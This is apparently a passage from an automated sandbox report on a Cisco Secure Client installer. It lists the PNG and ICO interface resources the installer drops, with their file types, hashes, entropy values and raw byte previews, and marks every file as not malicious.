                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toast_ws_info.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4052
                                                                                                                                      Entropy (8bit):7.943954771539964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                      MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                      SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                      SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                      SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):700
                                                                                                                                      Entropy (8bit):6.305816801627044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                      MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                      SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                      SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                      SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_help.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2106
                                                                                                                                      Entropy (8bit):7.848629133083243
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                      MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                      SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                      SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                      SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_help_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):478
                                                                                                                                      Entropy (8bit):7.3703130572324955
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                      MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                      SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                      SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                      SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_help_hover.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2245
                                                                                                                                      Entropy (8bit):7.881067272381913
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                      MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                      SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                      SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                      SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_help_hover_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):543
                                                                                                                                      Entropy (8bit):7.547901309478316
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                      MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                      SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                      SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                      SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_prefs.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1702
                                                                                                                                      Entropy (8bit):7.836409910643584
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                      MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                      SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                      SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                      SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_prefs_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):417
                                                                                                                                      Entropy (8bit):7.261808950496785
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                      MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                      SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                      SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                      SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_prefs_hover.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1856
                                                                                                                                      Entropy (8bit):7.845521158056495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                      MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                      SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                      SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                      SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\toolbar_prefs_hover_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):472
                                                                                                                                      Entropy (8bit):7.339402871750466
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                      MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                      SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                      SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                      SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\transition_1.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.5904244181066343
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                      MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                      SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                      SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                      SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..........................@...@...@...@...@...@...@...@...@...@...@...@...@...@.........................p...0.............................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................p.....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'..M'..M'..M'..nP:...w................`.............................@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..z]J.z]J.X5..M'..M'..M'..M'..z]J......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................nP:.M'..M'..M'...................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................M'..M'..M'..M'...xh..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................cB+.M'..z]J.M'..M'...xh......................@...s...s...s...s...s...s

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\transition_2.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.612237043911612
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                      MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                      SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                      SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                      SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\transition_3.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4144936482461397
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                      MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                      SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                      SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                      SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P.........................@...@...@...@...@...@...@...@...@...@...@...@...@...@..................................... .....................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..............................................kY.X5..M'..M'..M'..M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@.........................0...........cB+.M'..M'..M'..X5..z]J.z]J.z]J.nP:..@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................0.........kY.M'..M'..X5....w..........................@...s...s...s...s...s...s...s...s...s...s...s...s...@.................0........nP:.M'..M'.......................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................nP:.M'..X5...........................................@...s...s...s...s...s...s...s...s...s...s...s...s...@..................z]J.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\umbrella_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11585
                                                                                                                                      Entropy (8bit):7.961332304899258
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                      MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                      SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                      SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                      SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
